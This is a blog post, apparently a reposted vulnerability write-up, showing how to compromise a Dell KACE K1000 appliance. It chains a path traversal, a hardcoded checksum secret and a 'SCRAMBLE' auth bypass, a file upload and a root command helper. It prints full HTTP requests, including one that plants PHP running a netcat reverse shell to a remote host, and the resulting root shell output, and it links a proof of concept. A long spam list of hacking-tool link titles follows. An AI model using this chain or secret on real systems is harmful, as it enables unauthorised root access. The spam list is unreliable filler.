Friday, 28 August 2020

The Curious Case Of The Ninjamonkeypiratelaser Backdoor

A bit over a month ago I had the chance to play with a Dell KACE K1000 appliance ("http://www.kace.com/products/systems-management-appliance"). I'm not even sure how to feel about what I saw, mostly I was just disgusted. All of the following was confirmed on the latest version of the K1000 appliance (5.5.90545), if they weren't working on a patch for this - they are now.

Anyways, the first bug I ran into was an authenticated script that was vulnerable to path traversal:
POST /userui/downloadpxy.php HTTP/1.1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: kboxid=xxxxxxxxxxxxxxxxxxxxxxxx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
DOWNLOAD_SOFTWARE_ID=1227&DOWNLOAD_FILE=../../../../../../../../../../usr/local/etc/php.ini&ID=7&Download=Download

HTTP/1.1 200 OK
Date: Tue, 04 Feb 2014 21:38:39 GMT
Server: Apache
Expires: 0
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: public
Content-Length: 47071
Content-Disposition: attachment; filename*=UTF-8''..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fetc%2Fphp.ini
X-DellKACE-Appliance: k1000
X-DellKACE-Version: 5.5.90545
X-KBOX-Version: 5.5.90545
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/ini
[PHP]
;;;;;;;;;;;;;;;;;;;
; About php.ini   ;
;;;;;;;;;;;;;;;;;;;
That bug is neat, but its post-auth and can't be used for RCE because it returns the file as an attachment :(

So moving along, I utilized the previous bug to navigate the file system (its nice enough to give a directory listing if a path is provided, thanks!), this led me to a file named "kbot_upload.php". This file is located on the appliance at the following location:
http://targethost/service/kbot_upload.php
This script includes "KBotUpload.class.php" and then calls "KBotUpload::HandlePUT()", it does not check for a valid session and utilizes its own "special" means to auth the request.

The "HandlePut()" function contains the following calls:

        $checksumFn = $_GET['filename'];
        $fn = rawurldecode($_GET['filename']);
        $machineId = $_GET['machineId'];
        $checksum = $_GET['checksum'];
        $mac = $_GET['mac'];
        $kbotId = $_GET['kbotId'];
        $version = $_GET['version'];
        $patchScheduleId = $_GET['patchscheduleid'];
        if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
            KBLog($_SERVER["REMOTE_ADDR"] . " token checksum did not match, "
                  ."($machineId, $checksumFn, $mac)");
            KBLog($_SERVER['REMOTE_ADDR'] . " returning 500 "
                  ."from HandlePUT(".construct_url($_GET).")");
            header("Status: 500", true, 500);
            return;
        }

The server checks to ensure that the request is authorized by inspecting the "checksum" variable that is part of the server request. This "checksum" variable is created by the client using the following:

      md5("$filename $machineId $mac" . 'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');

Server side check:
    private static function calcTokenChecksum($filename, $machineId, $mac)
    {
        //return md5("$filename $machineId $mac" . $ip .
        //           'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
     
        // our tracking of ips really sucks and when I'm vpn'ed from
        // home I couldn't get patching to work, cause the ip that
        // was on the machine record was different from the
        // remote server ip.
        return md5("$filename $machineId $mac" .
                   'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
    }
The "secret" value is hardcoded into the application and cannot be changed by the end user (backdoor++;). Once an attacker knows this value, they are able to bypass the authorization check and upload a file to the server. 

In addition to this "calcTokenChecksumcheck, there is a hardcoded value of "SCRAMBLE" that can be provided by the attacker that will bypass the auth check (backdoor++;):  
 if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
Once this check is bypassed we are able to write a file anywhere on the server where we have permissions (thanks directory traversal #2!), at this time we are running in the context of the "www" user (boooooo). The "www" user has permission to write to the directory "/kbox/kboxwww/tmp", time to escalate to something more useful :)

From our new home in "tmp" with our weak user it was discovered that the KACE K1000 application contains admin functionality (not exposed to the webroot) that is able to execute commands as root using some IPC ("KSudoClient.class.php").


The "KSudoClient.class.php" can be used to execute commands as root, specifically the function "RunCommandWait". The following application call utilizes everything that was outlined above and sets up a reverse root shell, "REMOTEHOST" would be replaced with the host we want the server to connect back to:
    POST /service/kbot_upload.php?filename=db.php&machineId=../../../kboxwww/tmp/&checksum=SCRAMBLE&mac=xxx&kbotId=blah&version=blah&patchsecheduleid=blah HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Content-Length: 190
    <?php
    require_once 'KSudoClient.class.php';
    KSudoClient::RunCommandWait("rm /kbox/kboxwww/tmp/db.php;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc REMOTEHOST 4444 >/tmp/f");?> 
Once this was sent, we can setup our listener on our server and call the file we uploaded and receive our root shell:
    http://targethost/service/tmp/db.php
On our host:
    ~$ ncat -lkvp 4444
    Ncat: Version 5.21 ( http://nmap.org/ncat )
    Ncat: Listening on 0.0.0.0:4444
    Ncat: Connection from XX.XX.XX.XX
    sh: can't access tty; job control turned off
    # id
    uid=0(root) gid=0(wheel) groups=0(wheel)  

So at the end of the the day the count looks like this:
Directory Traversals: 2
Backdoors: 2
Privilege Escalation: 1
That all adds up to owned last time I checked.

Example PoC can be found at the following location:
https://github.com/steponequit/kaced/blob/master/kaced.py

Example usage can be seen below:


More articles
  1. Pentest Tools Website
  2. Hacker Tools Free Download
  3. World No 1 Hacker Software
  4. Black Hat Hacker Tools
  5. Hacker Tools 2019
  6. Pentest Tools Kali Linux
  7. Pentest Box Tools Download
  8. Hacking Tools For Windows
  9. New Hacker Tools
  10. Hacker Tools Apk
  11. Hacking Tools Windows 10
  12. Nsa Hack Tools
  13. Hack Tools
  14. Hacker Hardware Tools
  15. Beginner Hacker Tools
  16. Wifi Hacker Tools For Windows
  17. Pentest Tools Online
  18. Hack Tools 2019
  19. Hacker Tools 2019
  20. Hackrf Tools
  21. Pentest Tools Open Source
  22. Hacking Tools For Windows Free Download
  23. Pentest Tools List
  24. Hack Website Online Tool
  25. Pentest Tools Windows
  26. Pentest Tools
  27. Pentest Tools Apk
  28. Wifi Hacker Tools For Windows
  29. Hack Tools
  30. Hack Apps
  31. Hacker Tools Github
  32. Hacking Tools For Games
  33. Hacker Tools List
  34. Hacker Search Tools
  35. How To Hack
  36. Hacker Tools Online
  37. Hacking Tools Online
  38. Hack Rom Tools
  39. Hacking Tools For Windows Free Download
  40. Hacking Tools For Games
  41. Hack Tools For Ubuntu
  42. Hacker Tools Github
  43. Install Pentest Tools Ubuntu
  44. Hacking Tools Usb
  45. Blackhat Hacker Tools
  46. New Hack Tools
  47. Hacking Tools Free Download
  48. Pentest Tools Website Vulnerability
  49. Hacker Tools List
  50. Hacking Tools Windows
  51. Hack Tools Download
  52. Pentest Tools Apk
  53. Usb Pentest Tools
  54. Hacker Tools For Ios
  55. What Are Hacking Tools
  56. Hackrf Tools
  57. Hacking Tools Pc
  58. Hacking App
  59. Github Hacking Tools
  60. Hacking Tools Usb
  61. Best Hacking Tools 2020
  62. Pentest Recon Tools
  63. Hack Tools Github
  64. Pentest Reporting Tools
  65. How To Make Hacking Tools
  66. Hacking Tools Mac
  67. Install Pentest Tools Ubuntu
  68. Hacking Tools Pc
  69. Beginner Hacker Tools
  70. Pentest Tools For Windows
  71. Hacker
  72. Underground Hacker Sites
  73. Hacker Tools For Pc
  74. Hacker Tools Free Download
  75. Hack Tools For Ubuntu
  76. Hack Tools For Games
  77. New Hacker Tools
  78. Hack Tools Online
  79. Hacker Tools Free
  80. Hack Rom Tools
  81. Hack Tools For Pc
  82. Termux Hacking Tools 2019
  83. Hacker Tools 2019
  84. Hack Tools
  85. Hacker Tools For Windows
  86. Github Hacking Tools
  87. Top Pentest Tools
  88. Best Hacking Tools 2020
  89. Pentest Tools Website
  90. Pentest Tools Online
  91. Hacker Tools
  92. Pentest Tools Website Vulnerability
  93. World No 1 Hacker Software
  94. Free Pentest Tools For Windows
  95. Pentest Tools Linux
  96. Beginner Hacker Tools
  97. Best Hacking Tools 2019
  98. Termux Hacking Tools 2019
  99. Hacker Tool Kit
  100. Hacker Tools For Mac
  101. Hack Tool Apk No Root
  102. Hack Tools
  103. Easy Hack Tools
  104. Hacking Tools Software
  105. Hacker Tools Github
  106. Hack Tools

0 comments:

Post a Comment